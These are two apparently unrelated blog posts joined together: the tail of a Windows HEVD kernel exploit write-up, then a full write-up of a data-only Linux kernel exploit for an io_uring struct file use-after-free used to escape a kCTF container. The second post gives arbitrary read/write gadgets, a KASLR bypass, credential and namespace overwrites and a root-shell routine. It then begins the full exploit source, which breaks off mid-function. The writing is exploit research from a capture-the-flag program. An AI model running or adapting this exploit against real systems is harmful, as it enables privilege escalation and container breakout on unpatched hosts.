So now we know that breakpoints can also be a dangerous thing in exploit development.
The explanation for this issue is quite simple. When the WinDbg debugger catches an exception from the kernel, the operating system gets a signal that something went wrong, but while you are manipulating the stack, everything you do is an exception. The operating system doesn't understand that "an attacker is trying to manipulate the stack"; it just catches the exception and reboots, because the stack differs from your current kernel context.
This headache is similar to Structured Exception Handling (SEH) vulnerabilities, where setting breakpoints, or even attaching a debugger to a process, can cause crashes or render it unusable.
In my case, the way past the exception was to drop all breakpoints and let the kernel continue without rebooting on a non-critical exception.
Final Considerations
With this blogpost, iβve learned alot of content that i didnβt knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happyΒ too!
Itβs important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.
Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.
Thanks to the people who helped me along all thisΒ way:
- First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all thisΒ months!
- @xct_de
- @gal_kristal
- @33y0re
Hope you enjoyed!
Exploit Link (not so important at all)
References
- https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
- https://ctf101.org/binary-exploitation/return-oriented-programming/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://www.abatchy.com/2018/01/kernel-exploitation-4
- https://vulndev.io/2022/07/14/windows-kernel-exploitation-hevd-x64-use-after-free/
- https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/
- https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/TypeConfusion.c
Escaping the Google kCTF Container with a Data-Only Exploit
Introduction
I've been doing some Linux kernel exploit development/study and vulnerability research off and on since last fall, and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has been a popular target in the program's history up to this point, so I thought I'd find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit-development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn't rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them ended up using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging, as it seemed it was worthwhile "research". Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I'm very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.
The Bug
The bug is extremely simple (why can't I find one like this?) and was exploited in kCTF in November of last year. I didn't look very hard or ask around in the kCTF Discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.
I won't go into the bug very much because it wasn't really important to the exercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So from userspace we are able to open a file (refcount == 1), register the file as a fixed file (refcount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion, will erroneously decrement the refcount (refcount == 1), and then finally call io_uring_unregister_files, which ends up decrementing the refcount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.
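The refcount dance above can be sketched as a tiny userspace model. This is entirely my own mock: fake_file, fput_mock, and buggy_msg_ring_put are stand-ins for the kernel's real objects and helpers, and the commented-out fixed-file guard is the check the buggy path skipped.

```c
#include <assert.h>

// Minimal mock of a kernel file object's lifetime.
typedef struct {
    int refcount;
    int is_fixed; // registered as an io_uring fixed file
    int freed;
} fake_file;

static void fput_mock(fake_file *f)
{
    if (--f->refcount == 0)
        f->freed = 1; // object goes back to the allocator
}

// Model of the vulnerable completion path: it puts the file
// without first checking whether it is a fixed file.
static void buggy_msg_ring_put(fake_file *f)
{
    fput_mock(f); // missing: if (!f->is_fixed) guard
}

static void demo_bug(fake_file *f)
{
    f->refcount = 1;                // open()               -> refcount == 1
    f->is_fixed = 1; f->refcount++; // register fixed file  -> refcount == 2
    buggy_msg_ring_put(f);          // IORING_OP_MSG_RING   -> refcount == 1
    fput_mock(f);                   // unregister_files     -> refcount == 0, freed
}
```

After demo_bug runs, the object is freed while the original open() reference (our file descriptor) is still live, which is exactly the UAF condition described above.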
What sort of variant analysis can we perform on this type of bug? I'm not so sure; it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase, when there was the potential of putting a request file, the authors made sure to check whether the file was fixed. This file put forgot to perform the check. The broad lesson I learned from this was to try to find instances of an action being performed multiple times in a codebase and look for discrepancies between those routines.
Giant Shoulders
It's extremely important to stress that the blog post I linked above from @pqlpql and @Awarau1 was instrumental to this process. In that post they broke down in exquisite detail how to coerce the Linux kernel into freeing an entire page of file objects back to the page allocator by utilizing a technique called "cross-cache". file structs have their own dedicated cache in the kernel, so typical object-replacement shenanigans in UAF situations aren't very useful here, regardless of the struct file size. Thanks to their post, the concept of "cross-cache" has been used and discussed more and more, at least on Twitter in my anecdotal experience.
Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page reused as the backing for general cache objects, I elected to have the page reallocated in the form of a pipe buffer. Please see this blog post by @pqlpql for more information (it's a great write-up in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It's also extremely reliable in my experience. I'm not going to go into too much depth here because this wasn't any of my doing; this is 100% the people mentioned thus far. Please go read the material from them.
Arbitrary Read
The first thing I started to look for was a way to leak data, because I've been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer, blah blah blah. (Turns out this is not the case, and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was that I had an open file descriptor at my disposal, so let's go looking around the file-system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general, what I was doing at this point was going through the Linux kernel's syscall tables and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall's implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.
The copy_to_user function is a key part of the Linux kernel's interface with user space. It's used to copy data from the kernel's own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.
Now, if you go to the source code and search for copy_to_user, the 2nd result is a snippet in this bit right here:
static long fcntl_rw_hint(struct file *file, unsigned int cmd,
unsigned long arg)
{
struct inode *inode = file_inode(file);
u64 __user *argp = (u64 __user *)arg;
enum rw_hint hint;
u64 h;
switch (cmd) {
case F_GET_RW_HINT:
h = inode->i_write_hint;
if (copy_to_user(argp, &h, sizeof(*argp)))
return -EFAULT;
return 0;
case F_SET_RW_HINT:
if (copy_from_user(&h, argp, sizeof(h)))
return -EFAULT;
hint = (enum rw_hint) h;
if (!rw_hint_valid(hint))
return -EINVAL;
inode_lock(inode);
inode->i_write_hint = hint;
inode_unlock(inode);
return 0;
default:
return -EINVAL;
}
}
You can see that in the F_GET_RW_HINT case, a u64 ("h") is copied back to userspace. That value comes from inode->i_write_hint, and inode itself is returned from file_inode(file). The source code for that function is as follows:
static inline struct inode *file_inode(const struct file *f)
{
return f->f_inode;
}
Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
<SNIP>
And since we're using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let's go check out the inode struct and see what we can learn about this i_write_hint member.
struct inode {
umode_t i_mode;
unsigned short i_opflags;
kuid_t i_uid;
kgid_t i_gid;
unsigned int i_flags;
#ifdef CONFIG_FS_POSIX_ACL
struct posix_acl *i_acl;
struct posix_acl *i_default_acl;
#endif
const struct inode_operations *i_op;
struct super_block *i_sb;
struct address_space *i_mapping;
#ifdef CONFIG_SECURITY
void *i_security;
#endif
/* Stat data, not accessed from path walking */
unsigned long i_ino;
/*
* Filesystems may only read i_nlink directly. They shall use the
* following functions for modification:
*
* (set|clear|inc|drop)_nlink
* inode_(inc|dec)_link_count
*/
union {
const unsigned int i_nlink;
unsigned int __i_nlink;
};
dev_t i_rdev;
loff_t i_size;
struct timespec64 i_atime;
struct timespec64 i_mtime;
struct timespec64 i_ctime;
spinlock_t i_lock; /* i_blocks, i_bytes, maybe i_size */
unsigned short i_bytes;
u8 i_blkbits;
u8 i_write_hint;
<SNIP>
So i_write_hint is a u8, aka a single byte. This is perfect for what we need: inode becomes the address from which we read a byte back to userland (plus the offset to the member).
Since we control 100% of the backing data of the file, we control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and set the inode member to 0x1337, the kernel will dereference 0x1337 as an address and read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
This was really encouraging, finding an arbitrary read gadget so quickly, but what should we aim the read at?
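The pointer arithmetic behind the primitive can be sketched like this. The struct below is a mock of mine, carrying only the one field we care about; the 0x8f padding is an illustrative offset, not the real kernel layout, which in the actual exploit would be recovered from the target kernel's struct inode.

```c
#include <stddef.h>
#include <stdint.h>

// Mock inode: the padding stands in for everything that precedes
// i_write_hint in the real struct (offset is made up).
struct mock_inode {
    char pad[0x8f];
    uint8_t i_write_hint;
};

// To read the byte at `target`, point the fake file's f_inode at
// target minus the member offset; the kernel's F_GET_RW_HINT path
// then dereferences exactly `target` when it loads i_write_hint.
static uint64_t fake_inode_for(uint64_t target)
{
    return target - offsetof(struct mock_inode, i_write_hint);
}
```

A call like fcntl(uaf_fd, F_GET_RW_HINT, &h) then hands that one byte back to userland; repeating with target+1, target+2, and so on builds a full byte-at-a-time arbitrary read.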
Finding a Read Target
So we can read data at any address we want, but we don't know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area is not randomized from boot to boot; it is always at the same address. I knew this from the above blog post about the file UAF, but also vaguely from @ky1ebot tweets like this one.
cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of interrupt stacks in the kernel that can be used when, for instance, an exception must be handled.
After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently, and that was an address inside the error_entry function, which is as follows:
SYM_CODE_START_LOCAL(error_entry)
UNWIND_HINT_FUNC
PUSH_AND_CLEAR_REGS save_ret=1
ENCODE_FRAME_POINTER 8
testb $3, CS+8(%rsp)
jz .Lerror_kernelspace
/*
* We entered from user mode or we're pretending to have entered
* from user mode due to an IRET fault.
*/
swapgs
FENCE_SWAPGS_USER_ENTRY
/* We have user CR3. Change to kernel CR3. */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
IBRS_ENTER
UNTRAIN_RET
leaq 8(%rsp), %rdi /* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:
/* Put us onto the real thread stack. */
call sync_regs
RET
<SNIP>
error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was that of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts were taking place on the system that pushed that address onto the stack, presumably when the call was executed; maybe someone can chime in and correct me if I'm wrong about this portion of the exploit. It made sense to me at least, and the address's presence in the cpu_entry_area was so consistent that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.
Again, this portion didn't take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blog posts.
Where are the Write Gadgets?
I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by the experience of finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument, this time tracing through them looking for calls to copy_from_user, but I didn't have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blog post, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscall allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy, since we have access to an entire page of memory.
I couldn't use this technique for my personally imposed challenge, though, since it was already published. But it did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel codebase. As you can see, the member is used in many, many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.
This was very encouraging, since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled for a while to find a suitable gadget. Finally, I decided to look back at io_uring itself.
Looking for instances where file->private_data was used, I quickly found one right in the very function related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from req->file->private_data. Since we control the fake file, we control the private_data contents (a pointer to a fake io_ring_ctx in this case).
io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve an io_uring_cqe struct from our potentially faked io_ring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur didn't really fit my exploitation plan. So for now, we'll find a 2nd write in the same code path.
Immediately after the call to io_fill_cqe_aux, there is a call to io_commit_cqring using our faked io_ring_ctx:
static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
/* order cqe stores with ring update */
smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}
This is basically a memcpy: we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->rings->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4-byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done, in the spirit of my self-imposed challenge.
Exploitation Plan
Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.
I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from CyberArk was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen's blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.
Finding Init
At this point, my goal is to find the host init task_struct in memory and the values of a few important members: real_cred, cred, and nsproxy. real_cred tracks the user and group IDs that were originally responsible for creating the process and, unlike cred, remains constant and does not change due to things like setuid. cred conveys the "effective" credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task's namespaces: network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is at a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we could copy those values with our arbitrary read capability, since they reside at known addresses (offsets from the init task symbol).
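The address bookkeeping described above reduces to plain offset arithmetic; here is a sketch with made-up numbers. Every constant below is a placeholder of mine, since the real values depend on the exact kernel build and would be recovered from its symbols (e.g. /proc/kallsyms on a test box).

```c
#include <stdint.h>

// Placeholder offsets -- NOT real values for any kernel build.
#define ERROR_ENTRY_OFF 0x0e00040ULL // leaked error_entry addr - kernel base
#define INIT_TASK_OFF   0x1613940ULL // init_task - kernel base
#define CRED_OFF        0x728ULL     // offsetof(task_struct, cred)

// Defeat KASLR: subtract the known symbol offset from the leak.
static uint64_t kbase_from_leak(uint64_t leaked)
{
    return leaked - ERROR_ENTRY_OFF;
}

// Address we'd feed to the arbitrary read to fetch init's cred pointer.
static uint64_t init_cred_addr(uint64_t kbase)
{
    return kbase + INIT_TASK_OFF + CRED_OFF;
}
```

The same pattern yields the real_cred and nsproxy read targets; only the member offsets change.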
Forging Objects
With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct holds a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name; this name fits within the task_struct comm field, and as I traverse the linked list of tasks on the system, I simply check each task's comm field for my easily identifiable child process. You can see how I do that in this code snippet:
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember, we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this is done by crafting objects in the kernel heap and somehow discovering their address with a leak. In my case, I have a whole pipe buffer, 4096 bytes of memory, to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk-ing offsets, I was able to traverse my own task's file descriptor table and learn the address of my pipe buffer: the pipe-buffer page is obviously page-aligned, so I can just page-align the address we read from the file descriptor table for our UAF file. Now I know exactly where in memory my pipe buffer is, and I also know at what offset on that page our UAF struct file resides. I have a small helper function to set a "scratch space" region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
And then determining the location of our scratch space where we will forge the fake io_uring_ctx:
// Here, all we're doing is determining which half of the page the UAF file
// is on; if it's on the front half of the page, the back half is our scratch
// space, and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
Now we have one more read to do, and this is really just to make the exploit easier. To avoid a lot of debugging while triggering the write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx by reading its contents into a global buffer. Working from a good base, our forged object can then be set up properly to perform our arbitrary write. You can see me using the copy and updating the necessary fields here:
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
Performing Our Writes
Now, it's time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, the ones I said wouldn't work with the exploit plan? Well, the reason was that those three writes were as follows:
cqe = io_get_cqe(ctx);
if (likely(cqe)) {
WRITE_ONCE(cqe->user_data, user_data);
WRITE_ONCE(cqe->res, res);
WRITE_ONCE(cqe->flags, cflags);
They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because, as interrupts occurred, those members (pointers) would be deref'd and cause the kernel to panic since they were invalid values. So I opted to just use the 4-byte write inside io_commit_cqring instead. The 4-byte write caused problems of its own: at some points current has its creds checked, and with what basically amounted to a torn 8-byte write, we would leave current's cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.
Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy, and our child has all of the same privileges and capabilities that init does, including visibility into the host root file system. This is perfect, but I still wasn't able to get the flag!
I started to panic at this point that I had seriously done something wrong. The exploit is FULL of paranoid checks: I reread every overwritten value to make sure it's correct, for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered that in Andy Nguyen's blog post, he used his root privileges to explicitly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces as itself, lol. I still haven't followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment's was not. This ended up not being a big deal: I had to leave out some out-of-band confirmation/paranoia checks, but fortunately the arbitrary read we used isn't actually hooked in any way by SELinux, unlike most of the other fcntl syscall flags. Remember, at that point we don't know enough information to fake any objects in memory, so I'd be dead in the water if that read method was ruined by SELinux.
Conclusion
This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can also be fun to work on with friends; big thanks to everyone mentioned already, and also to @chompie1337, who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full; let me know if you have any trouble understanding any of it, thanks.
// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include "liburing.h"
// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL
// Shared memory with child
void *g_shmem;
// Child pid
pid_t g_child = -1;
// io_uring instance to use
struct io_uring g_ring = { 0 };
// UAF file handle
int g_uaf_fd = -1;
// Track pipes
struct fd_pair {
int fd[2];
};
struct fd_pair g_pipe = { 0 };
// The offset on the page where our `file` is
size_t g_off = 0;
// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };
// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;
// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;
void err(const char* format, ...)
{
if (!format) {
exit(EXIT_FAILURE);
}
fprintf(stderr, "%s", "[!] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, ": %s\n", strerror(errno));
sleep(5);
exit(EXIT_FAILURE);
}
void info(const char* format, ...)
{
if (!format) {
return;
}
fprintf(stderr, "%s", "[*] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, "%s", "\n");
}
// Get FD for test file
int get_test_fd(int victim)
{
// These are just different for kernel debugging purposes
char *file = NULL;
if (victim) { file = "/etc//passwd"; }
else { file = "/etc/passwd"; }
int fd = open(file, O_RDONLY);
if (fd < 0)
{
err("`open()` failed, file: %s", file);
}
return fd;
}
// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
// Open file to register
g_uaf_fd = get_test_fd(1);
info("Victim fd: %d", g_uaf_fd);
// Register the file
int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
if (ret)
{
err("`io_uring_register_files()` failed");
}
// Get hold of the sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Init sqe vals
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = 0;
sqe->flags |= IOSQE_FIXED_FILE;
ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(cpu_id, &mask);
if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
{
err("`sched_setaffinity()` failed: %s", strerror(errno));
}
return;
}
// Increase the number of FDs we can have open
void increase_fds(void)
{
struct rlimit old_lim, lim;
if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
{
err("`getrlimit()` failed: %s", strerror(errno));
}
lim.rlim_cur = old_lim.rlim_max;
lim.rlim_max = old_lim.rlim_max;
if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
{
err("`setrlimit()` failed: %s", strerror(errno));
}
info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);
return;
}
void create_pipe(void)
{
if (pipe(g_pipe.fd) == -1)
{
err("`pipe()` failed");
}
}
void release_pipe(void)
{
close(g_pipe.fd[PIPE_WRITE]);
